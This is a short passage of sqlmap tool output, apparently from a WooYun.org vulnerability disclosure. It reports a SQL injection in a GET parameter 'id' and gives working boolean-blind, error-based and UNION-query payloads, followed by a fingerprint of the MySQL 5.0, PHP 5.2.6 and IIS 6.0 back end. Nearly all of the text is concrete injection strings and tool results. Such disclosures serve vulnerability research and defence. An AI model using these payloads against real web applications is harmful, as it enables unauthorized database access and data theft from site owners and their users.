WooYun.org

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: id=(SELECT (CASE WHEN (1876=1876) THEN 1876 ELSE 1876*(SELECT 1876
FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
    Payload: id=1 AND (SELECT 1496 FROM(SELECT COUNT(*),CONCAT(0x7162707171,(SEL
ECT (ELT(1496=1496,1))),0x71786b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.
CHARACTER_SETS GROUP BY x)a)
    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7162707171,0x557
24749666d6e624150,0x71786b6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL
L--
---
[22:43:14] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: PHP 5.2.6, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0